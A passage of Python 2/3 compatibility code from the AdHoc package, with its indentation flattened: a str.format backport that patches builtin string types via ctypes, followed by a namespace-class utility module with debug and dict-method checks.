def _format_field(value, parts, conv, spec, want_bytes=False):
"""Format a replacement field."""
for k, part, _ in parts:
if k:
if part.isdigit():
value = value[int(part)]
else:
value = value[part]
else:
value = getattr(value, part)
if conv:
value = ((conv == 'r') and '%r' or '%s') % (value,)
if hasattr(value, '__format__'):
value = value.__format__(spec)
elif hasattr(value, 'strftime') and spec:
value = value.strftime(str(spec))
else:
value = _strformat(value, spec)
if want_bytes and isinstance(value, unicode):
return str(value)
return value
class FormattableString(object):
"""Class which implements method format().
The method format() behaves like str.format() in python 2.6+.
>>> FormattableString(u'{a:5}').format(a=42)
... # Same as u'{a:5}'.format(a=42)
u' 42'
"""
__slots__ = '_index', '_kwords', '_nested', '_string', 'format_string'
def __init__(self, format_string):
self._index = 0
self._kwords = {}
self._nested = {}
self.format_string = format_string
self._string = _format_str_sub(self._prepare, format_string)
def __eq__(self, other):
if isinstance(other, FormattableString):
return self.format_string == other.format_string
# Compare equal with the original string.
return self.format_string == other
def _prepare(self, match):
# Called for each replacement field.
part = match.group(0)
if part == '%':
return '%%'
if part[0] == part[-1]:
# '{{' or '}}'
assert part == part[0] * len(part)
return part[:len(part) // 2]
repl = part[1:-1]
field, _, format_spec = partition(repl, ':')
literal, sep, conversion = partition(field, '!')
if sep and not conversion:
raise ValueError("end of format while looking for "
"conversion specifier")
if len(conversion) > 1:
raise ValueError("expected ':' after format specifier")
if conversion not in 'rsa':
raise ValueError("Unknown conversion specifier %s" %
str(conversion))
name_parts = _field_part_re.findall(literal)
if literal[:1] in '.[':
# Auto-numbering
if self._index is None:
raise ValueError("cannot switch from manual field "
"specification to automatic field numbering")
name = str(self._index)
self._index += 1
if not literal:
del name_parts[0]
else:
name = name_parts.pop(0)[1]
if name.isdigit() and self._index is not None:
# Manual specification
if self._index:
raise ValueError("cannot switch from automatic field "
"numbering to manual field specification")
self._index = None
empty_attribute = False
for k, v, tail in name_parts:
if not v:
empty_attribute = True
if tail:
raise ValueError("Only '.' or '[' may follow ']' "
"in format field specifier")
if name_parts and k == '[' and not literal[-1] == ']':
raise ValueError("Missing ']' in format string")
if empty_attribute:
raise ValueError("Empty attribute in format string")
if '{' in format_spec:
format_spec = _format_sub_re.sub(self._prepare, format_spec)
rv = (name_parts, conversion, format_spec)
self._nested.setdefault(name, []).append(rv)
else:
rv = (name_parts, conversion, format_spec)
self._kwords.setdefault(name, []).append(rv)
return r'%%(%s)s' % id(rv)
def format(self, *args, **kwargs):
"""Same as str.format() and unicode.format() in Python 2.6+."""
if args:
kwargs.update(dict((str(i), value)
for (i, value) in enumerate(args)))
# Encode arguments to ASCII, if format string is bytes
want_bytes = isinstance(self._string, str)
params = {}
for name, items in self._kwords.items():
value = kwargs[name]
for item in items:
parts, conv, spec = item
params[str(id(item))] = _format_field(value, parts, conv, spec,
want_bytes)
for name, items in self._nested.items():
value = kwargs[name]
for item in items:
parts, conv, spec = item
spec = spec % params
params[str(id(item))] = _format_field(value, parts, conv, spec,
want_bytes)
return self._string % params
# the code below is used to monkey patch builtins
def _patch_builtin_types():
# originally from https://gist.github.com/295200 (Armin R.)
import ctypes
import sys
# figure out size of _Py_ssize_t
if hasattr(ctypes.pythonapi, 'Py_InitModule4_64'):
_Py_ssize_t = ctypes.c_int64
else:
_Py_ssize_t = ctypes.c_int
class _PyObject(ctypes.Structure):
pass
_PyObject._fields_ = [
('ob_refcnt', _Py_ssize_t),
('ob_type', ctypes.POINTER(_PyObject)),
]
# python with trace
if hasattr(sys, 'getobjects'):
_PyObject._fields_[0:0] = [
('_ob_next', ctypes.POINTER(_PyObject)),
('_ob_prev', ctypes.POINTER(_PyObject)),
]
class _DictProxy(_PyObject):
_fields_ = [('dict', ctypes.POINTER(_PyObject))]
def get_class_dict(cls):
d = getattr(cls, '__dict__', None)
if hasattr(d, 'pop'):
return d
if d is None:
raise TypeError('given class does not have a dictionary')
setitem = ctypes.pythonapi.PyDict_SetItem
ns = {}
# Reveal dict behind DictProxy
dp = _DictProxy.from_address(id(d))
setitem(ctypes.py_object(ns), ctypes.py_object(None), dp.dict)
return ns[None]
def format(self, *args, **kwargs):
"""S.format(*args, **kwargs) -> string
Return a formatted version of S, using substitutions from args and kwargs.
The substitutions are identified by braces ('{' and '}').
"""
return FormattableString(self).format(*args, **kwargs)
# This does the actual monkey patch on str and unicode
for cls in str, unicode:
get_class_dict(cls)['format'] = format
def init(force=False):
if force or not hasattr(str, 'format'):
_patch_builtin_types()
def selftest():
import datetime
F = FormattableString
d = datetime.date(2010, 9, 7)
u = unicode
# Initialize
init(True)
assert F(u("{0:{width}.{precision}s}")).format('hello world',
width=8, precision=5) == u('hello ')
assert F(u("The year is {0.year}")).format(d) == u("The year is 2010")
assert F(u("Tested on {0:%Y-%m-%d}")).format(d) == u("Tested on 2010-09-07")
assert u("{0:{width}.{precision}s}").format('hello world',
width=8, precision=5) == u('hello ')
assert u("The year is {0.year}").format(d) == u("The year is 2010")
assert u("Tested on {0:%Y-%m-%d}").format(d) == u("Tested on 2010-09-07")
assert "{0:{width}.{precision}s}".format('hello world',
width=8, precision=5) == 'hello '
assert "The year is {0.year}".format(d) == "The year is 2010"
assert "Tested on {0:%Y-%m-%d}".format(d) == "Tested on 2010-09-07"
print('Test successful')
if __name__ == '__main__':
selftest() | AdHoc | /AdHoc-0.3.2.tar.gz/AdHoc-0.3.2/stringformat_local.py | stringformat_local.py |
# --------------------------------------------------
# |||:sec:||| COMPATIBILITY
# --------------------------------------------------
import sys
# (progn (forward-line 1) (snip-insert-mode "py.b.printf" t) (insert "\n"))
# adapted from http://www.daniweb.com/software-development/python/code/217214
try:
printf = eval("print") # python 3.0 case
except SyntaxError:
printf_dict = dict()
try:
exec("from __future__ import print_function\nprintf=print", printf_dict)
printf = printf_dict["printf"] # 2.6 case
except SyntaxError:
def printf(*args, **kwd): # 2.4, 2.5, define our own Print function
fout = kwd.get("file", sys.stdout)
w = fout.write
if args:
w(str(args[0]))
sep = kwd.get("sep", " ")
for a in args[1:]:
w(sep)
w(str(a))
w(kwd.get("end", "\n"))
del printf_dict
# (progn (forward-line 1) (snip-insert-mode "py.b.sformat" t) (insert "\n"))
try:
('{0}').format(0)
def sformat (fmtspec, *args, **kwargs):
return fmtspec.format(*args, **kwargs)
except AttributeError:
try:
import stringformat
except ImportError:
try:
import stringformat_local as stringformat
except ImportError:
printf('error: (nd) stringformat missing. Try `easy_install stringformat`.', file=sys.stderr)
def sformat (fmtspec, *args, **kwargs):
return stringformat.FormattableString(fmtspec).format(
*args, **kwargs)
# (progn (forward-line 1) (snip-insert-mode "py.f.isstring" t) (insert "\n"))
# hide from 2to3
exec('''
def isstring(obj):
return isinstance(obj, basestring)
''')
try:
isstring("")
except NameError:
def isstring(obj):
return isinstance(obj, str) or isinstance(obj, bytes)
# (progn (forward-line 1) (snip-insert-mode "py.b.dict_items" t) (insert "\n"))
try:
getattr(dict(), 'iteritems')
ditems = lambda d: getattr(d, 'iteritems')()
dkeys = lambda d: getattr(d, 'iterkeys')()
dvalues = lambda d: getattr(d, 'itervalues')()
except AttributeError:
ditems = lambda d: getattr(d, 'items')()
dkeys = lambda d: getattr(d, 'keys')()
dvalues = lambda d: getattr(d, 'values')()
import os
import re
# --------------------------------------------------
# |||:sec:||| CONFIGURATION
# --------------------------------------------------
__all__ = [
'NameSpace',
'NameSpaceDict',
'NameSpaceMeta',
'NameSpaceNS',
]
dbg_comm = ((('dbg_comm' in globals()) and (globals()['dbg_comm'])) or ('# '))
dbg_twid = ((('dbg_twid' in globals()) and (globals()['dbg_twid'])) or (9))
dbg_fwid = ((('dbg_fwid' in globals()) and (globals()['dbg_fwid'])) or (20))
# (progn (forward-line 1) (snip-insert-mode "py.b.dbg.setup" t) (insert "\n"))
# (progn (forward-line 1) (snip-insert-mode "py.b.strings" t) (insert "\n"))
# (progn (forward-line 1) (snip-insert-mode "py.f.strclean" t) (insert "\n"))
# (progn (forward-line 1) (snip-insert-mode "py.f.issequence" t) (insert "\n"))
# (progn (forward-line 1) (snip-insert-mode "py.b.logging" t) (insert "\n"))
# (progn (forward-line 1) (snip-insert-mode "py.b.ordereddict" t) (insert "\n"))
# (progn (forward-line 1) (snip-insert-mode "py.main.pyramid.activate" t) (insert "\n"))
# (progn (forward-line 1) (snip-insert-mode "py.main.project.libdir" t) (insert "\n"))
# (progn (forward-line 1) (snip-insert-mode "py.main.sql.alchemy" t) (insert "\n"))
# (progn (forward-line 1) (snip-insert-mode "py.main.sql.ws" t) (insert "\n"))
# @:adhoc_run_time:@
#import adhoc # @:adhoc:@
# (progn (forward-line 1) (snip-insert-mode "py.b.posix" t) (insert "\n"))
# (progn (forward-line 1) (snip-insert-mode "py.b.os.system.sh" t) (insert "\n"))
# (progn (forward-line 1) (snip-insert-mode "py.b.prog.path" t) (insert "\n"))
# (progn (forward-line 1) (snip-insert-mode "py.b.line.loop" t) (insert "\n"))
# --------------------------------------------------
# |||:sec:||| CLASSES
# --------------------------------------------------
# (progn (forward-line 1) (snip-insert-mode "py.c.placeholder.template" t) (insert "\n"))
# (progn (forward-line 1) (snip-insert-mode "py.c.key.hash.ordered.dict" t) (insert "\n"))
# (progn (forward-line 1) (snip-insert-mode "py.c.progress" t) (insert "\n"))
# (progn (forward-line -1) (insert "\n") (snip-insert-mode "py.s.class" t) (backward-symbol-tag 2 "fillme" "::"))
# --------------------------------------------------
# |||:sec:||| NAMESPACE CLOSURES
# --------------------------------------------------
import weakref
# @:adhoc_template:@ -
class NameSpaceNS(object): # ||:cls:||
# @:adhoc_template:@
'''Class based namespace for dict based namespace.
The dictonary interface of the namespace dict can be exposed on 3
levels:
1. expose_dict=0: No dict interface
2. expose_dict=1: dict interface for namespace object
3. expose_dict=2: dict interface for namespace class object
'''
# @:adhoc_template:@ -
@staticmethod
def no_attrib_msg(cls, name): # |:fnc:|
msg = ("'", cls.__name__, "'",
" object has no attribute '", name, "'")
return ''.join(msg)
@staticmethod
def no_set_attrib_msg(cls, name): # |:fnc:|
return "can't set attribute"
@staticmethod
def no_del_attrib_msg(cls, name): # |:fnc:|
return "can't delete attribute"
@staticmethod
def property_closure(obj, expose_dict): # ||:clo:||
# @:adhoc_template:@
'''Namespace class object property closure.'''
# @:adhoc_template:@ -
prop = weakref.ref(obj)
cls = obj.__class__
result = []
def __getattr__(obj, name): # |:clm:|
return super(cls, prop()).__getattribute__(name)
result.append(__getattr__)
def __setattr__(obj, name, value): # |:clm:|
super(cls, prop()).__setattr__(name, value)
result.append(__setattr__)
def __delattr__(obj, name): # |:clm:|
super(cls, prop()).__delattr__(name)
result.append(__delattr__)
if expose_dict > 1:
def __cmp__(self, *args, **kwargs):
return prop().__cmp__(*args, **kwargs)
result.append(__cmp__)
def __contains__(self, *args, **kwargs):
return prop().__contains__(*args, **kwargs)
result.append(__contains__)
def __delitem__(self, *args, **kwargs):
return prop().__delitem__(*args, **kwargs)
result.append(__delitem__)
def __eq__(self, *args, **kwargs):
return prop().__eq__(*args, **kwargs)
result.append(__eq__)
def __ge__(self, *args, **kwargs):
return prop().__ge__(*args, **kwargs)
result.append(__ge__)
def __getitem__(self, *args, **kwargs):
return prop().__getitem__(*args, **kwargs)
result.append(__getitem__)
def __gt__(self, *args, **kwargs):
return prop().__gt__(*args, **kwargs)
result.append(__gt__)
def __hash__(self, *args, **kwargs):
return prop().__hash__(*args, **kwargs)
result.append(__hash__)
def __iter__(self, *args, **kwargs):
return prop().__iter__(*args, **kwargs)
result.append(__iter__)
def __le__(self, *args, **kwargs):
return prop().__le__(*args, **kwargs)
result.append(__le__)
def __len__(self, *args, **kwargs):
return prop().__len__(*args, **kwargs)
result.append(__len__)
def __lt__(self, *args, **kwargs):
return prop().__lt__(*args, **kwargs)
result.append(__lt__)
def __ne__(self, *args, **kwargs):
return prop().__ne__(*args, **kwargs)
result.append(__ne__)
def __setitem__(self, *args, **kwargs):
return prop().__setitem__(*args, **kwargs)
result.append(__setitem__)
def __sizeof__(self, *args, **kwargs):
return prop().__sizeof__(*args, **kwargs)
result.append(__sizeof__)
return result
@classmethod
def property_(nsc, obj, expose_dict): # ||:clg:||
# @:adhoc_template:@
'''Property instance generator.'''
# @:adhoc_template:@ -
class property__(object): # |:ccl:|
if expose_dict > 1:
__getattribute__, __setattr__, __delattr__, \
__cmp__, __contains__, __delitem__, __eq__, \
__ge__, __getitem__, __gt__, __hash__, __iter__, \
__le__, __len__, __lt__, __ne__, __setitem__, __sizeof__, \
= (nsc.property_closure(obj, expose_dict))
else:
__getattribute__, __setattr__, __delattr__, \
= (nsc.property_closure(obj, expose_dict))
return property__()
ignore_dict_attrs = [
'__getattribute__',
'__init__',
'__new__',
'__repr__',
]
# @:adhoc_template:@
known_dict_attrs = []
# @:adhoc_template:@ -
@classmethod
def namespace_closure(nsc, expose_dict): # ||:clo:||
# @:adhoc_template:@
'''Namespace closure.'''
# @:adhoc_template:@ -
ns = {}
props = {
'__dict__': ns
# __class__
# _property_
}
def __property_init__(obj, cls): # |:clm:|
# @:adhoc_template:@
'''Setup special __class__ and _property_ properties for object.'''
# @:adhoc_template:@ -
# cls = object.__getattribute__(obj, '__class__')
props['__class__'] = cls
props['_property_'] = nsc.property_(obj, expose_dict)
return cls
def __getattr__(obj, name): # |:clm:|
# @:adhoc_template:@
'''Get attribute from namespace dict.
Special properties `__dict__`, `__class__`, `_property_` come
from property dict.
'''
# @:adhoc_template:@ -
try:
return props[name]
except KeyError:
pass
# allow dictionary access
if expose_dict:
if (name not in nsc.ignore_dict_attrs
and name in ns.__class__.__dict__):
# @:adhoc_template:@
# if name not in nsc.known_dict_attrs: # |:debug:| show used attributes
# nsc.known_dict_attrs.append(name)
# @:adhoc_template:@ -
return getattr(ns, name)
try:
return ns[name]
except KeyError:
raise AttributeError(
nsc.no_attrib_msg(props['__class__'], name))
def __setattr__(obj, name, value): # |:clm:|
# @:adhoc_template:@
'''Set attribute in namespace dict.
If special property __dict__ is set, the namespace dict is
cleared and updated from value.
Special properties `__class__` and `_property_` cannot be set.
'''
# @:adhoc_template:@ -
if name in props:
if name == '__dict__':
ns.clear()
ns.update(value)
else:
raise AttributeError(
nsc.no_set_attrib_msg(props['__class__'], name))
else:
ns[name] = value
def __delattr__(obj, name): # |:clm:|
# @:adhoc_template:@
'''Delete attribute in namespace dict.
Special properties `__dict__`, `__class__`, `_property_`
cannot be deleted.
'''
# @:adhoc_template:@ -
if name in props:
raise AttributeError(
nsc.no_del_attrib_msg(props['__class__'], name))
try:
del(ns[name])
except KeyError:
raise AttributeError(
nsc.no_attrib_msg(props['__class__'], name))
return __getattr__, __setattr__, __delattr__, __property_init__
@classmethod
def namespace(nsc, for_=object, expose_dict=0): # ||:clg:||
# @:adhoc_template:@
'''Namespace (meta-) class generator.'''
# @:adhoc_template:@ -
class namespace_(for_): # |:ccl:|
__getattribute__, __setattr__, __delattr__, _ns_prop_init_ =(
nsc.namespace_closure(expose_dict))
# exposed dict interface
if expose_dict:
def __contains__(self, *args, **kwargs):
return getattr(self.__dict__, '__contains__')(*args, **kwargs)
def __delitem__(self, *args, **kwargs):
return getattr(self.__dict__, '__delitem__')(*args, **kwargs)
def __eq__(self, *args, **kwargs):
return getattr(self.__dict__, '__eq__')(*args, **kwargs)
def __ge__(self, *args, **kwargs):
return getattr(self.__dict__, '__ge__')(*args, **kwargs)
def __getitem__(self, *args, **kwargs):
return getattr(self.__dict__, '__getitem__')(*args, **kwargs)
def __gt__(self, *args, **kwargs):
return getattr(self.__dict__, '__gt__')(*args, **kwargs)
def __hash__(self, *args, **kwargs):
return getattr(self.__dict__, '__hash__')(*args, **kwargs)
def __iter__(self, *args, **kwargs):
return getattr(self.__dict__, '__iter__')(*args, **kwargs)
def __le__(self, *args, **kwargs):
return getattr(self.__dict__, '__le__')(*args, **kwargs)
def __len__(self, *args, **kwargs):
return getattr(self.__dict__, '__len__')(*args, **kwargs)
def __lt__(self, *args, **kwargs):
return getattr(self.__dict__, '__lt__')(*args, **kwargs)
def __ne__(self, *args, **kwargs):
return getattr(self.__dict__, '__ne__')(*args, **kwargs)
def __setitem__(self, *args, **kwargs):
return getattr(self.__dict__, '__setitem__')(*args, **kwargs)
def __sizeof__(self, *args, **kwargs):
return getattr(self.__dict__, '__sizeof__')(*args, **kwargs)
def clear(self, *args, **kwargs):
return getattr(self.__dict__, 'clear')(*args, **kwargs)
def copy(self, *args, **kwargs):
return getattr(self.__dict__, 'copy')(*args, **kwargs)
def fromkeys(self, *args, **kwargs):
return getattr(self.__dict__, 'fromkeys')(*args, **kwargs)
def get(self, *args, **kwargs):
return getattr(self.__dict__, 'get')(*args, **kwargs)
def items(self, *args, **kwargs):
return getattr(self.__dict__, 'items')(*args, **kwargs)
def keys(self, *args, **kwargs):
return getattr(self.__dict__, 'keys')(*args, **kwargs)
def pop(self, *args, **kwargs):
return getattr(self.__dict__, 'pop')(*args, **kwargs)
def popitem(self, *args, **kwargs):
return getattr(self.__dict__, 'popitem')(*args, **kwargs)
def setdefault(self, *args, **kwargs):
return getattr(self.__dict__, 'setdefault')(*args, **kwargs)
def update(self, *args, **kwargs):
return getattr(self.__dict__, 'update')(*args, **kwargs)
def values(self, *args, **kwargs):
return getattr(self.__dict__, 'values')(*args, **kwargs)
_ns_for_py2_ = hasattr(dict.__dict__, 'iteritems')
if _ns_for_py2_:
def __cmp__(self, *args, **kwargs):
return getattr(self.__dict__, '__cmp__')(*args, **kwargs)
def has_key(self, *args, **kwargs):
return getattr(self.__dict__, 'has_key')(*args, **kwargs)
def iteritems(self, *args, **kwargs):
return getattr(self.__dict__, 'iteritems')(*args, **kwargs)
def iterkeys(self, *args, **kwargs):
return getattr(self.__dict__, 'iterkeys')(*args, **kwargs)
def itervalues(self, *args, **kwargs):
return getattr(self.__dict__, 'itervalues')(*args, **kwargs)
def viewitems(self, *args, **kwargs):
return getattr(self.__dict__, 'viewitems')(*args, **kwargs)
def viewkeys(self, *args, **kwargs):
return getattr(self.__dict__, 'viewkeys')(*args, **kwargs)
def viewvalues(self, *args, **kwargs):
return getattr(self.__dict__, 'viewvalues')(*args, **kwargs)
def __init__(self, *args, **kwargs): # |:ccm:|
for_.__getattribute__(self, '_ns_prop_init_')(namespace_)
for_.__init__(self, *args, **kwargs)
return namespace_
NameSpaceMeta = NameSpaceNS.namespace # ||:cls:|| generator
'''Namespace (meta-) class generator.
NameSpaceMeta(for_=object, expose_dict=0)
'''
class NameSpace(NameSpaceMeta()):
# @:adhoc_template:@
'''Namespace class inheriting from object, without dict interface.
Defined as: ``class NameSpace(NameSpaceMeta()):``'''
# @:adhoc_template:@ -
pass
class NameSpaceDict(NameSpaceMeta(expose_dict=2)):
# @:adhoc_template:@
'''Namespace class inheriting from object, with complete dict interface.
Defined as: ``class NameSpace(NameSpaceMeta(expose_dict=2)):``'''
# @:adhoc_template:@ -
pass
# @:adhoc_template:@
# --------------------------------------------------
# |||:sec:||| FUNCTIONS
# --------------------------------------------------
# (progn (forward-line 1) (snip-insert-mode "py.f.hl" t) (insert "\n"))
hlr = None
def hlcr(title=None, tag='|||' ':CHP:|||', rule_width=50, **kwargs): # ||:fnc:||
comm = ((('dbg_comm' in globals()) and (globals()['dbg_comm'])) or ('# '))
dstr = []
dstr.append(''.join((comm, '-' * rule_width)))
if title:
dstr.append(sformat('{0}{2:^{1}} {3!s}',
comm, ((('dbg_twid' in globals()) and (globals()['dbg_twid'])) or (9)),
tag, title))
dstr.append(''.join((comm, '-' * rule_width)))
return '\n'.join(dstr)
def hlsr(title=None, tag='||' ':SEC:||', rule_width=35, **kwargs): # |:fnc:|
return hlcr(title, tag, rule_width)
def hlssr(title=None, tag='|' ':INF:|', rule_width=20, **kwargs): # |:fnc:|
return hlcr(title, tag, rule_width)
def hlc(*args, **kwargs): # |:fnc:|
for line in hlcr(*args, **kwargs).splitlines():
printe(line, **kwargs)
def hls(*args, **kwargs): # |:fnc:|
for line in hlsr(*args, **kwargs).splitlines():
printe(line, **kwargs)
def hlss(*args, **kwargs): # |:fnc:|
for line in hlssr(*args, **kwargs).splitlines():
printe(line, **kwargs)
def hl(*args, **kwargs): # |:fnc:|
for line in hlr(*args, **kwargs).splitlines():
printe(line, **kwargs)
def hl_lvl(level=0): # |:fnc:|
global hlr
if level == 0:
hlr = hlssr
elif level == 1:
hlr = hlsr
else:
hlr = hlcr
hl_lvl(0)
# (progn (forward-line 1) (snip-insert-mode "py.f.single.quote" t) (insert "\n"))
# (progn (forward-line 1) (snip-insert-mode "py.f.remove.match" t) (insert "\n"))
# (progn (forward-line 1) (snip-insert-mode "py.f.printenv" t) (insert "\n"))
# (progn (forward-line 1) (snip-insert-mode "py.f.uname-s" t) (insert "\n"))
# (progn (forward-line 1) (snip-insert-mode "py.f.printe" t) (insert "\n"))
def printe(*args, **kwargs): # ||:fnc:||
kwargs['file'] = kwargs.get('file', sys.stderr)
printf(*args, **kwargs)
# (progn (forward-line 1) (snip-insert-mode "py.f.dbg.squeeze" t) (insert "\n"))
# (progn (forward-line 1) (snip-insert-mode "py.f.dbg.indent" t) (insert "\n"))
# (progn (forward-line -1) (insert "\n") (snip-insert-mode "py.s.func" t) (backward-symbol-tag 2 "fillme" "::"))
class NameSpaceCheck(object): # ||:cls:||
def __init__(self, *args, **kwargs): # |:mth:|
printf('# NameSpaceCheck.__init__ called')
printe(sformat(
"{0}{3:^{1}} {4:<{2}s}: ]{5!s}[",
dbg_comm, dbg_twid, dbg_fwid, ':DBG:', 'args', args))
printe(sformat(
"{0}{3:^{1}} {4:<{2}s}: ]{5!s}[",
dbg_comm, dbg_twid, dbg_fwid, ':DBG:', 'kwargs', kwargs))
prop = self._property_
self.args = args
self.kwargs = kwargs
super(NameSpaceCheck, self).__init__()
def method(self): # |:mth:|
printf('# NameSpaceCheck.method called')
self._property_.method2()
def method2(self): # |:mth:|
printf('# NameSpaceCheck.method2 called')
def __del__(self): # |:mth:|
printf('# BYE, BYE from NameSpaceCheck')
printe(sformat(
"{0}{3:^{1}} {4:<{2}s}: ]{5!s}[",
dbg_comm, dbg_twid, dbg_fwid, ':DBG:', 'vars(self)', vars(self)))
def check_namespace_features(expose_dict=0): # ||:fnc:||
hl(sformat('Check namespace features (expose_dict={0})',
expose_dict))
class nsdc (NameSpaceMeta(NameSpaceCheck, expose_dict)):
pass
nsd = nsdc('arg0', 'arg1', kwarg0='kw', kwarg1='kw')
nsd._property_.method()
if expose_dict > 1:
nsd._property_['dict'] = 'access'
nsd._property_['keys'] = 'prop keys'
keys = nsd._property_['keys']
printe(sformat(
"{0}{3:^{1}} {4:<{2}s}: ]{5!s}[",
dbg_comm, dbg_twid, dbg_fwid, ':DBG:', 'prop keys', keys))
if expose_dict:
keys = nsd._property_.keys()
printe(sformat(
"{0}{3:^{1}} {4:<{2}s}: ]{5!s}[",
dbg_comm, dbg_twid, dbg_fwid, ':DBG:', 'prop keys()', keys))
nsd['keys'] = 'nsd keys'
keys = nsd['keys']
printe(sformat(
"{0}{3:^{1}} {4:<{2}s}: ]{5!s}[",
dbg_comm, dbg_twid, dbg_fwid, ':DBG:', 'nsd keys', keys))
keys = nsd.keys()
printe(sformat(
"{0}{3:^{1}} {4:<{2}s}: ]{5!s}[",
dbg_comm, dbg_twid, dbg_fwid, ':DBG:', 'nsd keys()', keys))
nsd.keys = 'nsd attr keys'
keys = nsd['keys']
printe(sformat(
"{0}{3:^{1}} {4:<{2}s}: ]{5!s}[",
dbg_comm, dbg_twid, dbg_fwid, ':DBG:', 'nsd attr keys', keys))
nsd.keys = 'nsd attr keys'
keys = nsd.keys
printe(sformat(
"{0}{3:^{1}} {4:<{2}s}: ]{5!s}[",
dbg_comm, dbg_twid, dbg_fwid, ':DBG:', 'nsd attr keys', keys))
return
# --------------------------------------------------
# |||:sec:||| DICT ATTRIBUTES
# --------------------------------------------------
# |:here:|
python2_dict_attrs = [
'__cmp__',
'__contains__',
'__delitem__', # AttributeError
# '__doc__' # None,
'__eq__',
'__ge__',
'__getitem__',
'__gt__',
'__hash__',
'__iter__',
'__le__',
'__len__',
'__lt__',
'__ne__',
'__setitem__', # AttributeError
'__sizeof__',
'clear', # AttributeError
'copy',
'fromkeys', # AttributeError
'get',
'has_key',
'items',
'iteritems',
'iterkeys',
'itervalues',
'keys',
'pop', # AttributeError
'popitem', # AttributeError
'setdefault', # AttributeError
'update', # AttributeError
'values',
'viewitems', # AttributeError
'viewkeys', # AttributeError
'viewvalues', # AttributeError
]
python3_dict_attrs = [
'__contains__',
'__delitem__', # AttributeError
# '__doc__' # None,
'__eq__',
'__ge__',
'__getitem__',
'__gt__',
# '__hash__' # None,
'__iter__',
'__le__',
'__len__',
'__lt__',
'__ne__',
'__setitem__', # AttributeError
'__sizeof__',
'clear', # AttributeError
'copy',
'fromkeys', # AttributeError
'get',
'items',
'keys',
'pop', # AttributeError
'popitem', # AttributeError
'setdefault', # AttributeError
'update', # AttributeError
'values',
]
python2_unique = [
'__cmp__',
'__hash__',
'has_key',
'iteritems',
'iterkeys',
'itervalues',
'viewitems',
'viewkeys',
'viewvalues',
]
python3_unique = [
]
# direct class lookup: # |:info:|
# :DBG: dict op : ]__cmp__ [ attribs used: ][][
# :DBG: dict op : ]__contains__[ attribs used: ][][
# :DBG: dict op : ]__delitem__ [ attribs used: ][][
# :DBG: dict op : ]__getitem__ [ attribs used: ][][
# :DBG: dict op : ]__iter__ [ attribs used: ][][
# :DBG: dict op : ]__len__ [ attribs used: ][][
# :DBG: dict op : ]__setitem__ [ attribs used: ][][
# lookup via __getattribute__: # |:info:|
# :DBG: dict op : ]clear [ attribs used: ]['clear'][
# :DBG: dict op : ]copy [ attribs used: ]['copy'][
# :DBG: dict op : ]fromkeys [ attribs used: ]['fromkeys'][
# :DBG: dict op : ]get [ attribs used: ]['get'][
# :DBG: dict op : ]items [ attribs used: ]['items'][
# :DBG: dict op : ]keys [ attribs used: ]['keys'][
# :DBG: dict op : ]pop [ attribs used: ]['pop'][
# :DBG: dict op : ]popitem [ attribs used: ]['popitem'][
# :DBG: dict op : ]setdefault [ attribs used: ]['setdefault'][
# :DBG: dict op : ]update [ attribs used: ]['update'][
# :DBG: dict op : ]values [ attribs used: ]['values'][
def show_dict_methods(as_methods=False): # ||:fnc:||
# |:debug:| find Python2/3 unique methods
# printf('python2_unique')
# for attr in python2_dict_attrs:
# if attr not in python3_dict_attrs:
# python2_unique.append(attr)
# printe(sformat(" '{0}',", attr))
# printf('python3_unique')
# for attr in python3_dict_attrs:
# if attr not in python2_dict_attrs:
# python3_unique.append(attr)
# printe(sformat(" '{0}',", attr))
# printf('done')
known_dict_attrs = python2_dict_attrs
ignore_dict_attrs = [
'__getattribute__',
'__init__',
'__new__',
'__repr__',
]
# |:here:|
for dattr in sorted(dict.__dict__):
if dattr in ignore_dict_attrs:
continue
try:
avalue = getattr(dict.__dict__, dattr)
if hasattr(avalue, '__call__'):
if not as_methods:
printe(sformat(" '{0}',", dattr))
else:
if not as_methods:
printe(sformat("# '{0}' # {1},", dattr, avalue))
continue
except AttributeError:
if not as_methods:
printe(sformat(" '{0}', # AttributeError", dattr))
if as_methods:
printe(sformat("""\
def {0}(self, *args, **kwargs):
return getattr(self.__dict__, '{0}')(*args, **kwargs)
""", dattr))
def check_dict_methods(): # ||:fnc:||
da_check_ = []
da_checked = []
def da_check_init():
del(da_check_[:])
NameSpaceNS.known_dict_attrs = []
da_check_.append(list(NameSpaceNS.known_dict_attrs))
def da_check_report(for_='dict.something'):
da_checked.append(for_)
old_known = da_check_[0]
new_attribs = []
for attr in NameSpaceNS.known_dict_attrs:
if attr not in old_known:
new_attribs.append(attr)
printe(sformat(
"{0}{3:^{1}} {4:<{2}s}: ]{5!s:<12s}[ attribs used: ]{6!s}[",
dbg_comm, dbg_twid, dbg_fwid, ':DBG:', 'dict op', for_, list(sorted(new_attribs))))
ns = NameSpace()
# |:here:|
da_check_init()
ns['setitem1'] = 'setitem value'
ns['setitem2'] = 'setitem value'
ns['setitem3'] = 'setitem value'
ns['setitem4'] = 'setitem value'
da_check_report('__setitem__')
da_checked.extend(('__hash__',))
da_check_init()
x = ns['setitem1']
da_check_report('__getitem__')
da_check_init()
del(ns['setitem4'])
da_check_report('__delitem__')
da_check_init()
if 'some' in ns:
pass
da_check_report('__contains__')
da_check_init()
for x in ns:
pass
da_check_report('__iter__')
da_check_init()
x = len(ns)
da_check_report('__len__')
da_checked.extend(('__sizeof__',))
da_check_init()
for x in sorted(ns):
pass
da_check_report('__cmp__')
da_checked.extend(('__eq__', '__ge__', '__gt__', '__le__', '__lt__', '__ne__',))
da_check_init()
for x in ns.keys():
pass
da_check_report('keys')
da_check_init()
for x in ns.values():
pass
da_check_report('values')
da_check_init()
for x in ns.items():
pass
da_check_report('items')
it = list(ns.items())
da_check_init()
ns.update(it)
da_check_report('update')
da_check_init()
pop = ns.get('setitem6', 'None')
da_check_report('get')
da_check_init()
pop = ns.setdefault('setitem1', 'None')
da_check_report('setdefault')
da_check_init()
pop = ns.fromkeys(['a', 'b', 'c'])
da_check_report('fromkeys')
da_check_init()
pop = ns.pop('setitem1')
printe(sformat(
"{0}{3:^{1}} {4:<{2}s}: ]{5!s}[",
dbg_comm, dbg_twid, dbg_fwid, ':DBG:', 'pop', pop))
da_check_report('pop')
da_check_init()
pop = ns.popitem()
da_check_report('popitem')
try:
# python2 unique
da_check_init()
it = ns.iterkeys()
da_check_report('iterkeys')
da_check_init()
it = ns.itervalues()
da_check_report('itervalues')
da_check_init()
it = ns.iteritems()
da_check_report('iteritems')
da_check_init()
it = ns.viewkeys()
da_check_report('viewkeys')
da_check_init()
it = ns.viewvalues()
da_check_report('viewvalues')
da_check_init()
it = ns.viewitems()
da_check_report('viewitems')
except AttributeError:
